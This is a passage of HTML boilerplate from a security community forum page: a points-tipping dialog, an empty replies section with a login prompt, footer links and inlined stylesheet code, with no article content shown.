<div class=modal-header>
|
|||
|
|
<h4 class=modal-title id=myModalLabel style=text-align:center>
|
|||
|
|
积分打赏
|
|||
|
|
</h4>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-body id=button-value>
|
|||
|
|
<div style=text-align:center>
|
|||
|
|
<div role=group>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
|
|||
|
|
1分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
|
|||
|
|
2分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
|
|||
|
|
5分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
<br>
|
|||
|
|
<div style=margin-top:20px>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
|
|||
|
|
8分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
|
|||
|
|
10分
|
|||
|
|
</button>
|
|||
|
|
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
|
|||
|
|
20分
|
|||
|
|
</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class=modal-footer id=confirm>
|
|||
|
|
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
|
|||
|
|
<button type=button class="btn btn-primary" id=reward_topic data-pk=15609>确定</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box">
|
|||
|
|
<ol class=breadcrumb>
|
|||
|
|
<li class=active>0 条回复</li>
|
|||
|
|
</ol>
|
|||
|
|
<div class="box-container post-container">
|
|||
|
|
|
|||
|
|
<ul>
|
|||
|
|
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
|
|||
|
|
</ul>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div class="row box" id=reply-box>
|
|||
|
|
|
|||
|
|
<div class="box-container clearfix">
|
|||
|
|
|
|||
|
|
<div class=reminder>
|
|||
|
|
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15609&from_type=xianzhi"><strong>登录</strong></a> 后跟帖
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer class=bs-docs-footer>
|
|||
|
|
<div class="container text-center">
|
|||
|
|
<div class=links>
|
|||
|
|
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
|
|||
|
|
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
|
|||
|
|
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
|
|||
|
|
<a href=https://xz.aliyun.com/connection>联系我们</a>
|
|||
|
|
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
|
|||
|
|
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
|
|||
|
|
* Pico.css v1.5.6 (https://picocss.com)
|
|||
|
|
* Copyright 2019-2022 - Licensed under MIT
|
|||
|
|
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
|